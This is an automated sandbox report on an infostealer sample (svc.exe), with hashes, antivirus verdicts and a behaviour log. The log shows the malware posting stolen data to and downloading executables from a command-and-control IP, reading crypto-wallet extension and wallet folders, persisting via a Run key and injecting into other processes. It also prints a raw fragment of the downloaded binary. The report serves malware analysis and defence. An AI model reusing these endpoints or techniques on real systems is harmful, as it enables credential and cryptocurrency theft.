popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

svc.exe

Gen1 Browser Login Data Stealer Generic Malware Malicious Library ASPack Antivirus UPX Malicious Packer Anti_VM PE64 OS Processor Check JPEG Format ZIP Format PE File DLL
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 Jan. 18, 2025, 4:31 p.m. Jan. 18, 2025, 4:35 p.m.
Size 1.2MB
Type PE32+ executable (GUI) x86-64, for MS Windows
MD5 e2b9936f5b41295ba4ca23afae692813
SHA256 2c74e012e213dc721370aeed8f4932e677f28a95b3da7e3f94e74013f078f066
CRC32 8905C849
ssdeep 24576:ACCer7uT8MPvT0hLiKQ+Ijxqykg+Tzwl2KzK:/fr7uXr0hqjxqo
Yara
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature
  • infoStealer_browser_b_Zero - browser info stealer
  • IsPE64 - (no description)
  • Generic_Malware_Zero - Generic Malware
  • UPX_Zero - UPX packed file
  • OS_Processor_Check_Zero - OS Processor Check

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
185.81.68.147 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
suspicious_features POST method with no referer header, Connection to IP address suspicious_request POST http://185.81.68.147/svcstealer/get.php
suspicious_features Connection to IP address suspicious_request GET http://185.81.68.147/zx.exe
suspicious_features Connection to IP address suspicious_request GET http://185.81.68.147/update.exe
request POST http://185.81.68.147/svcstealer/get.php
request GET http://185.81.68.147/zx.exe
request GET http://185.81.68.147/update.exe
request POST http://185.81.68.147/svcstealer/get.php
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2548
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007304c000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2884
region_size: 94208
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000001f10000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1452
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefd53a000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1452
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076cac000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1452
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000004740000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2976
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007304c000
process_handle: 0xffffffffffffffff
1 0 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nphplpgoakhhjchkkhmiggakijnkhfnd\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kgdijkcfiglijhaglibaidbipiejjfdp\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfchfdkjhcoekhdldggegebfakaaiog\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ckklhkaabbmdjkahiaaplikpdddkenic\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oafedfoadhdjjcipmcbecikgokpaphjk\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnlhokffphohmfcddnibpohmkdfafdli\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfogiafebfohielmmehodmfbbebbbpei\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-debug-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\libffi-7.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-localization-l1-2-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-heap-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\temp_11832.exe
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-crt-stdio-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-timezone-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-crt-convert-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-sysinfo-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-processthreads-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-crt-process-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-crt-conio-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-processthreads-l1-1-1.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\ucrtbase.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-crt-math-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-console-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-memory-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-profile-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-file-l1-2-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-namedpipe-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-rtlsupport-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-crt-environment-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-crt-utility-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-string-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-datetime-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\libcrypto-1_1.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-synch-l1-2-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-libraryloader-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-synch-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-crt-filesystem-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-util-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\python38.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-file-l2-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-errorhandling-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-crt-locale-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-file-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-handle-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\temp_11786.exe
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-processenvironment-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-crt-runtime-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-crt-string-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-interlocked-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-crt-time-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\VCRUNTIME140.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-crt-heap-l1-1-0.dll
Time & API Arguments Status Return Repeated

SetFileAttributesW

 file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: C:\Users\test22\AppData\Roaming\03BD451ED4621855818353
filepath: C:\Users\test22\AppData\Roaming\03BD451ED4621855818353
1 1 0

SetFileAttributesW

 file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: C:\Users\test22\AppData\Roaming\03BD451ED4621855818353\03BD451ED4621855818353.exe
filepath: C:\Users\test22\AppData\Roaming\03BD451ED4621855818353\03BD451ED4621855818353.exe
1 1 0
Time & API Arguments Status Return Repeated

Process32NextW

 snapshot_handle: 0x00000000000000b8
process_name: sdclt.exe
process_identifier: 2380
1 1 0

Process32NextW

 snapshot_handle: 0x00000000000000b8
process_name: svc.exe
process_identifier: 2548
1 1 0

Process32NextW

 snapshot_handle: 0x00000000000001b8
process_name: WmiPrvSE.exe
process_identifier: 2680
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000158
process_name: 
process_identifier: 1060439344
0 0

Process32NextW

 snapshot_handle: 0x00000000000003d8
process_name: temp_11786.exe
process_identifier: 2804
1 1 0

Process32NextW

 snapshot_handle: 0x00000000000003d8
process_name: inject-x64.exe
process_identifier: 2828
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000374
process_name: temp_11786.exe
process_identifier: 2976
1 1 0

Process32NextW

 snapshot_handle: 0x000000000000009c
process_name: temp_11832.exe
process_identifier: 2884
1 1 0
Time & API Arguments Status Return Repeated

InternetReadFile

 buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $ £XhcðXhcðXhcð`ñ_hcðfñìhcðgñRhcð›ëžð[hcð›ë`ñQhcð›ëgñIhcð›ëfñphcðbñShcðXhbðÉhcðKìgñAhcðKìañYhcðRichXhcðPEd†³éŠgð" (”XÐÀ@ ^>[`Á€„lÇxô`"hÀ€œ@°P.text’” `.rdataB&°(˜@@.dataØsàÀ@À.pdata"`$Î@@.rsrcôöò@@.relochè@BHƒì(è/á‹H‹îωè'áH‹H‹ÝÏH‰HH‹ ÒÏHƒÄ(é¹$ÌÌÌÌÌÌÌÌÌHqCÃÌÌÌÌÌÌÌÌH‰\$H‰l$ L‰D$VWATAUAWHƒì H‹ò3íHý§D‹ýI‹øH‹ÙA½ÿÿÿÿèå.L‹àH…ÀuHVH Ú§èMé‹VE3ÀH“I‹Ìè7é…ÀyLFHä§H ¨èˆ鯋N è‹0L‹øH…Àu D‹N LFH¨H ¦èXé€~uM‹ÏE3ÀH‹ÖI‹ÌèÌëW‹^ L‰t$PM‹÷H…Ût;¸ DH;ØH‹ûM‹ÌA¸HGøI‹ÎH‹×è^åHƒørhL÷¸ H+ßuϋÅH‹|$`L‹t$P…Àt I‹ÏèÓ/L‹ýI‹ÌèØáI‹ïM…ÿtH‹×I‹Ïèù.D‹èH‹Íèª/H‹\$XA‹ÅH‹l$hHƒÄ A_A]A\_^ÃLFH!¦H N¦è}A‹Åë‹ÌÌÌÌÌÌÌÌH‰T$H‰L$SUVWAVAWHìˆ3ÀM‹ðH‹ÚH‰D$PH‹ùH‰D$XA¸XH‰D$`H@¤‰D$(HL$ H‰D$ ‹èI‹ñèXžD‹ø…Àt(HSD‹ÀH #¤èŽ¸ÿÿÿÿHÄˆA_A^_^][ù L‰¬$€èç.L‹èH…ÀuLCH4¤H q¤è¸é\¹ è¹.H‹èH…ÀuLCHV¤H C¤èŠé.L‰¤$ÐA¿ÿÿÿÿD‹c¸ I‹ÜL;àL‹ÏºI‹ÍHGØL‹ÃèªãH;Ã…æH‹Ïè á…À…ÖL+ã‰\$(L‰l$ f„» H‰l$03҉\$8HL$ 膁‹øA¿ÿÿÿÿHƒùv|ƒøtr‹L$8H+ÙM…öt)M‹ÎL‹ÃºH‹ÍènêH;Ãu I‹Îè•à…ÀtA‹ÿëBH…ötL‹ÃH‹ÕH‹Îè‰}Hóƒ|$8„{ÿÿÿƒÿtM…ätH‹¼$ÀéÿÿÿE3ÿë ¿ýÿÿÿH‹”$ÈH {£HƒÂD‹ÇèïL‹¤$ÐHL$ èm™I‹ÍèA-H‹Íè9-L‹¬$€A‹ÇHÄˆA_A^_^][ÃÌÌH‰\$ VAVAWHƒì H‹òH‹ÙH¤E3öè +L‹øH…Àu!HVH ¤èu3ÀH‹\$XHƒÄ A_A^^ËVE3ÀH“I‹ÏèSå…ÀyLFH¤H 5¤è¤黋N è§,L‹ðH…Àu D‹N LFH ¤H -¢èt鋀~uM‹ÎE3ÀH‹ÖI‹Ïèèüÿÿëc‹^ H‰l$@I‹îH‰|$HL‰d$PH…Ût8A¼ fDI;ÜH‹ûM‹ÏA¸IGüH‹ÍH‹×ènáHƒørBHïH+ßuÔ3ÀH‹|$HH‹l$@L‹d$P…Àt I‹Îèã+E3öI‹ÏèèÝH‹\$XI‹ÆHƒÄ A_A^^ÃLFHW¢H „¢è³¸ÿÿÿÿëªÌÌÌÌÌÌÌÌÌÌÌÌ@SWHƒì8€znH‹úH‹Ùu$èxúÿÿ‹Ø…ÀyHWH _£è‹ÃHƒÄ8_[ÃHn£L‰d$`I‹Èèe)L‹àH…Àu(LGHR£H £è6L‹d$`¸ÿÿÿÿHƒÄ8_[ÃH2¢L‰|$ H‹Ëè!)L‹øH…ÀuHWH ¢è‰»ÿÿÿÿéT‹WE3ÀH“I‹Ïènã…Ày!LGH¢H P¢è¿»ÿÿÿÿé€uE3ÉM‹ÄH‹×I‹Ïè.ûÿÿ‹ØéôL‰l$03ÛA½ L‰t$(A‹Íè*L‹ðH…Àu!LGH H  è^»ÿÿÿÿé§H‰t$X‹w H…ö„‰H‰l$P@ff„I;õH‹îM‹ÏA¸IGíI‹ÎH‹ÕènßHƒør1M‹ÌA¸H‹ÕI‹Îè”æHƒørH+õu½ë,H¼ H é ëHl H ™ LGèÄ»ÿÿÿÿH‹l$PI‹Îè®)H‹t$XL‹l$0L‹t$(I‹Ïè§ÛI‹ÌèŸÛL‹|$ ‹ÃL‹d$`HƒÄ8_[ÃH‰\$H‰t$WHƒì H‹™H‹òH‹ùH;™spfff„D¶CA@¦¨÷t:A€ødt4A€ønt.A€øxt(HCL‹ÆL+À€¶B¶ +ÑuHÿÀ…Éuí…ÒëHKH‹Öèí)…Àt ‹HØH;Ÿr›3ÀH‹\$0H‹t$8HƒÄ _ÃH‹t$8H‹ÃH‹\$0HƒÄ _ÃÌÌÌÌÌÌ@SHƒì H‹HÇH…ÛtH‹‹è›(H‹ËHƒÄ [éŽ(HƒÄ [ÃÌÌÌÌÌÌÌÌÌÌÌ̋HÂÃÌÌÌÌÌÌÌÌÌÌH‰\$H‰l$ WHìH‹7ÇH3ÄH‰„$ˆHYŸH‹é3ÛèK&H‹øH…À„H‹ ºH”$€H‰„$€A¸HÁèH‹Ï H‰´$¨ˆ„$ƒè5]H‹ðH…À„7E3ÀH‹ÐH‹Ïèoà…ÀyH  H UŸèÄ é L‹ÏHL$ ºXA¸èÝHƒøsH H _žèŽ é׺`¹èn'H‹ØH…ÀuHûŸH ( è_ é¨L‹ÍL ºH‹ËèÓ‹D$(H‹ ȉD$(LL$8‹D$,LîŸȉD$,º@‹D$0ȉD$0‹D$4ȉD$4‰ƒèˆ‹D$(E3ÀH+ðH‹ÏHFXH‰ƒ‹T$,HÐèhߋL$0èÛ&H‰ƒH…ÀuHˆŸH eœè¬ éõ‹T$0L‹ÏA¸H‹ÈèîÛHƒøsH}ŸH Jèy é‹D$0H‹ÏHƒH‰ƒè*مÀtH gŸèÚ é“H‹“H;“ƒD‹âÄfo RŸf3ÀAƒø|óof8Áóëf„‹ ‚ɉ ‚HÿÀHƒø|ï¶JA¦¨÷t€ùdt€ùnt €ùxt2Àë° ƒ•Àˆƒ‹HÐH;“r’H‹Ïè¶×H‹´$¨H‹ÃH‹Œ$ˆH3Ì蟜Lœ$I‹[ I‹k(I‹ã_ÃÌÌÌÌÌÌÌÌÌÌL‰D$L‰L$ SUVWHƒ
request_handle: 0x0000000000cc0024
1 1 0
Time & API Arguments Status Return Repeated

Process32NextW

 snapshot_handle: 0x00000000000000b8
process_name: svc.exe
process_identifier: 2548
0 0

Process32NextW

 snapshot_handle: 0x00000000000000b8
process_name: svc.exe
process_identifier: 2548
0 0

Process32NextW

 snapshot_handle: 0x00000000000000b8
process_name: svc.exe
process_identifier: 2548
0 0

Process32NextW

 snapshot_handle: 0x00000000000000b8
process_name: svc.exe
process_identifier: 2548
0 0

Process32NextW

 snapshot_handle: 0x00000000000001b8
process_name: svc.exe
process_identifier: 2548
0 0

Process32NextW

 snapshot_handle: 0x00000000000001b8
process_name: svc.exe
process_identifier: 2548
0 0

Process32NextW

 snapshot_handle: 0x00000000000001b8
process_name: svc.exe
process_identifier: 2548
0 0

Process32NextW

 snapshot_handle: 0x00000000000001b8
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

 snapshot_handle: 0x00000000000001b8
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

 snapshot_handle: 0x00000000000001b8
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

 snapshot_handle: 0x00000000000001b8
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

 snapshot_handle: 0x0000000000000158
process_name: 
process_identifier: 1060439344
0 0

Process32NextW

 snapshot_handle: 0x00000000000002c8
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

 snapshot_handle: 0x00000000000002c8
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

 snapshot_handle: 0x00000000000002c8
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

 snapshot_handle: 0x000000000000030c
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

 snapshot_handle: 0x000000000000030c
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

 snapshot_handle: 0x000000000000030c
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

 snapshot_handle: 0x000000000000030c
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

 snapshot_handle: 0x0000000000000310
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

 snapshot_handle: 0x0000000000000310
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

 snapshot_handle: 0x0000000000000310
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

 snapshot_handle: 0x0000000000000310
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

 snapshot_handle: 0x0000000000000320
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

 snapshot_handle: 0x0000000000000320
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

 snapshot_handle: 0x0000000000000320
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

 snapshot_handle: 0x0000000000000320
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

 snapshot_handle: 0x0000000000000320
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

 snapshot_handle: 0x0000000000000320
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

 snapshot_handle: 0x000000000000031c
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

 snapshot_handle: 0x000000000000031c
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

 snapshot_handle: 0x000000000000031c
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

 snapshot_handle: 0x000000000000031c
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

 snapshot_handle: 0x000000000000031c
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

 snapshot_handle: 0x000000000000031c
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

 snapshot_handle: 0x000000000000031c
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

 snapshot_handle: 0x000000000000031c
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

 snapshot_handle: 0x000000000000031c
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

 snapshot_handle: 0x000000000000031c
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

 snapshot_handle: 0x000000000000031c
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

 snapshot_handle: 0x000000000000031c
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

 snapshot_handle: 0x000000000000031c
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

 snapshot_handle: 0x000000000000031c
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

 snapshot_handle: 0x000000000000031c
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

 snapshot_handle: 0x000000000000031c
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

 snapshot_handle: 0x000000000000031c
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

 snapshot_handle: 0x000000000000031c
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

 snapshot_handle: 0x0000000000000310
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

 snapshot_handle: 0x0000000000000310
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

 snapshot_handle: 0x0000000000000310
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0
wmi SELECT * FROM Win32_BIOS
buffer Buffer with sha1: abd72abe1f826fcf770b9ac28bc795d8c59b33d7
host 185.81.68.147
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 1452
region_size: 94208
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000004560000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000000000000009c
1 0 0
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Services reg_value C:\Users\test22\AppData\Roaming\03BD451ED4621855818353\03BD451ED4621855818353.exe
file C:\Users\test22\AppData\Roaming\Bitcoin\
file C:\ProgramData\65EDB51284023538805469\Wallets\Bitcoin\
file C:\Users\test22\AppData\Roaming\Electrum\wallets\
file C:\ProgramData\65EDB51284023538805469\Wallets\Electrum\
file C:\Users\test22\AppData\Local\Temp\temp_11786.exe
file C:\Users\test22\AppData\Local\Temp\temp_11832.exe
wmi SELECT * FROM AntiVirusProduct
wmi SELECT * FROM Win32_BIOS
Process injection Process 2884 created a remote thread in non-child process 1452
Time & API Arguments Status Return Repeated

CreateRemoteThread

 thread_identifier: 0
process_identifier: 1452
function_address: 0x0000000004561c58
flags: 0
stack_size: 0
parameter: 0x0000000004560000
process_handle: 0x000000000000009c
1 160 0
Process injection Process 2884 manipulating memory of non-child process 1452
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 1452
region_size: 94208
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000004560000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000000000000009c
1 0 0
Lionic Trojan.Win32.Stealer.12!c
Cylance Unsafe
Sangfor Trojan.Win32.Agent.Vue2
CrowdStrike win/malicious_confidence_70% (W)
BitDefender Trojan.GenericKD.75433973
Symantec ML.Attribute.HighConfidence
Elastic malicious (moderate confidence)
ESET-NOD32 a variant of Generik.HFFPMFS
APEX Malicious
Kaspersky Trojan-Spy.Win32.Stealer.fkny
Rising Stealer.OskiStealer!1.C41E (CLASSIC)
DrWeb Trojan.Siggen30.51451
TrendMicro Trojan.Win64.AMADEY.YXFAQZ
McAfeeD ti!2C74E012E213
CTX exe.trojan.stealer
Sophos Mal/Generic-S
SentinelOne Static AI - Malicious PE
FireEye Generic.mg.e2b9936f5b41295b
Google Detected
Antiy-AVL Trojan[PSW]/Win32.Stealer
Kingsoft Win32.Troj.Unknown.a
Microsoft Trojan:Win32/Casdet!rfn
Varist W64/ABTrojan.VEIA-0471
McAfee Artemis!E2B9936F5B41
DeepInstinct MALICIOUS
Malwarebytes Spyware.Stealer
Ikarus Trojan.SuspectCRC
Panda Trj/Chgt.AD
TrendMicro-HouseCall Trojan.Win64.AMADEY.YXFAQZ
Fortinet W32/PossibleThreat